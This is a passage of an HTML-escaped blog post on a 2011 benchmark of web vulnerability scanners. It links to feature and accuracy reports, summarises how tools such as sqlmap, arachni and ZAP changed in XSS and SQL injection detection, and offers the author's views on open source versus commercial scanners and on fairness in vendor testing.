Scanners&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;Source, License and Technical Details of Tested Scanners&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Additional information was gathered during the benchmark, including information related to the different features of the various scanners. These details are organized in the following reports, and might prove useful when searching for tools for specific tasks or tests:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%201of2%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;Comparison of Active Vulnerability Detection Features (Audit Features) – 1 of 2&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%202of2%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;Comparison of Active Vulnerability Detection Features (Audit Features) – 2 of 2&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;Comparison of Complementary Scanning Features - Passive Analysis, CGI Scanning, Etc&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20-%20WAVSEP%20Benchmark%202011%20-%20Final3.pdf&quot;&gt;&lt;b&gt;Comparison of Usability, Coverage and Scan Initiation Features&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20-%20WAVSEP%20Benchmark%202011%20-%20Final.pdf&quot;&gt;&lt;b&gt;Comparison of Authentication, Scan Control and Connection Support Features&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;Comparison of Advanced and Uncommon Features&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For detailed information on the accuracy assessment results, refer to the following reports:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;&lt;b&gt;Benchmark Results – Reflected XSS Detection Accuracy&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;&lt;b&gt;Benchmark Results – SQL Injection Detection Accuracy – Unified&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Blind%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;&lt;b&gt;Benchmark Drilldown – Blind &amp;amp; Time Based SQL Injection Detection Accuracy&lt;/b&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Error-Based%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;&lt;b&gt;Benchmark Drilldown – Error Dependant SQL Injection Detection Accuracy&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Scan%20Log%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;The Scan Logs&lt;/b&gt;&lt;/a&gt; (describing the executing process and configuration of each scanner) &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Additional information on the scan logs, the list of untested tools and the abnormal behaviors of scanners can be found in the article appendix sections (at the end of the article):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;‎&lt;/span&gt;Appendix B - Section 30&lt;/u&gt;&lt;/b&gt; – an appendix that contains a list of tools that were not included in the benchmark &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;‎&lt;/span&gt;Appendix D - Section 32&lt;/u&gt;&lt;/b&gt; – an appendix that describes scanners with abnormal behavior&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025796&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;8. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;What Changed?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Since the latest benchmark, many open source &amp;amp; commercial tools added new features and improved their detection accuracy. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following list presents a summary of changes in the detection accuracy of &lt;b&gt;free &amp;amp; open source&lt;/b&gt; tools that were tested in the previous benchmark:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;arachni&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;dramatic improvement &lt;/b&gt;in the detection accuracy of Reflected XSS exposures, and a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of SQL Injection exposures (verified on mysql).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;sqlmap&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of SQL Injection exposures (verified on mysql).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Acunetix Free Edition&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;major&lt;/b&gt; &lt;b&gt;improvement&lt;/b&gt; in the detection accuracy of RXSS exposures.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Watobo&lt;/u&gt; &lt;/i&gt;&lt;/b&gt;– a &lt;b&gt;major&lt;/b&gt; &lt;b&gt;improvement&lt;/b&gt; in the detection accuracy of SQL Injection exposures (verified on mysql).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;N&lt;/u&gt;&lt;/i&gt;&lt;u&gt;-Stalker 2009 FE vs. 2012 &lt;i&gt;FE&lt;/i&gt;&lt;/u&gt; &lt;/b&gt;– although this tool is a very similar to N-Stalker 2009 FE, the surprising discovery I had was that the detection accuracy of N-Stalker 2012 is very different – it detects only a quarter of what N-Stalker 2009 used to detect. Assuming this result is not related to a bug in the product or in my testing procedure, it means that the newer free version is significantly &lt;b&gt;less effective&lt;/b&gt; than the previous free version, at least at detecting reflected XSS. A legitimate business decision, true, but surprising nevertheless.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;aidSQL&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;&lt;i&gt;major improvement&lt;/i&gt;&lt;/b&gt; in the detection accuracy of SQL Injection exposures (verified on mysql).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;XSSer&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a &lt;b&gt;major improvement &lt;/b&gt;in the detection accuracy of Reflected XSS exposures, even though the results were not consistent.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Skipfish &lt;/u&gt;&lt;/i&gt;&lt;/b&gt;– a slight improvement in the detection accuracy of RXSS exposures (it is currently unknown if the RXSS detection improvement is related to changes in code or to the enhanced testing method), and a slight decrease in the detection accuracy of SQLi exposures (might be related to the different testing environment and the different method used to count the results).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;WebSecurify&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – a slight improvement in the detection accuracy of RXSS exposures (it is currently unknown if the RXSS detection improvement is related to changes in code or to the enhanced testing method). &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Zed Attack Proxy (ZAP)&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – Identical results. Any minor difference was probably caused due to the testing environment, configuration or minor issues.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;W3AF&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – slight improvement in the detection accuracy of RXSS exposures and slight decrease in the detection accuracy of SQL Injection exposures. &lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Netsparker Community Edition&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; – Identical results.&lt;b&gt;&lt;u&gt; &lt;/u&gt;&lt;/b&gt;Any minor difference was probably caused due to the testing environment, configuration or minor issues.&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;WebCruiser&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;u&gt; &lt;b&gt;&lt;i&gt;Free Edition&lt;/i&gt;&lt;/b&gt;&lt;/u&gt; – a minor decrease in accuracy, due to fixing documentation mistakes from the previous benchmark.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025797&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;9. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Initial Conclusions – Open Source vs. Commercial&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following section presents &lt;b&gt;my own personal&lt;/b&gt; &lt;b&gt;opinions&lt;/b&gt; on the results of the benchmark, and since opinions are &lt;b&gt;beliefs&lt;/b&gt;, which are affected by emotions and circumstances, you are entitled to your own. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;After testing over &lt;b&gt;48&lt;/b&gt; open source scanners multiple times, and after comparing the results and experiences to the ones I had after testing &lt;b&gt;12&lt;/b&gt; commercial ones (and those are just the ones that I reported), I have reached the following conclusions:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;As far as accuracy &amp;amp; features, the distance between open source tools and commercial tools is not as big as it used to be – tools such as sqlmap, arachni, wapiti, w3af and others are slowly closing the gap. That being said, there still is a significant difference in stability &amp;amp; false positives, in which most open source tools tend to have more false positives and be relatively unstable when compared to most commercial tools.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Some open source tools, even the most accurate ones, are relatively difficult to install &amp;amp; use, and still require fine-tuning in various fields. In my opinion, a non-technical QA engineer will have difficulties using these tools, and as a general rule, I&#39;ll recommend using them if your background is relatively technical (consultant, developer, etc). For all the rest, especially non-technical enterprise employees that prefer a decent usage experience - stick with commercial produces, with their free versions, or with the simple variations of open source tools.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;If you are using a commercial product, it&#39;s best to merge the use of tools with a wide variety of features with tools with high detection accuracy.&amp;nbsp; It&#39;s possible to use tools that have relatively good scores in both of these aspects, or use a tool with a wide variety of features with another tool that has enhanced accuracy. Yes, this statement can be interpreted to using combinations of commercial and open source tools, and even to using two different commercial tools, so that one tool will complete the other. Budget? Take a look at the cost diversity of the tools, before you make any harsh decisions; I promise you&#39;ll be surprised. &lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025798&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;10. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Morale Issues in Commercial Product Benchmarks&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;While testing the various commercial tools, I have dealt with certain moral issues that I want to share. Many vendors that were aware of this research enhanced their tools in preparation for it, an action I respect, and consider a positive step. Since the testing platform that included most of the tests was available online, preparing for the benchmark was a relatively easy task for any vendor that invested the resources.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;So, is the benchmark fair for vendors that couldn’t improve their tools due to various circumstances?&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The testing process of a commercial tool is usually much more complicated and restrictive then testing a free or open source tool; it is necessary to contact the vendor to obtain an evaluation license, and the latest version of the tool (a process that can take several weeks), the evaluation licenses are usually restricted to a short evaluation timeframe (usually two weeks), and thus, updating and testing the tools in a future date can become a hassle (since some of the process will have to be performed all over again)… but why am I telling you all this?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Simply, because I believe that the relevance of the test I performed for vendors that provided me an extended evaluation period and access to new builds was better; for example, a few days before the latest benchmark, immediately after testing the latest versions of two major vendors, I decided to rescan the platform using the latest versions of all the commercial tools I have, to ensure that the benchmark will be published with the most updated results.&lt;/div&gt;&lt;div 